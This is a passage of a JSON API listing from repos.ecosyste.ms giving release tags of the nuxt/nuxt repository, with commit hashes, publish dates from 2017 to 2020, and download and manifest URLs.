rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2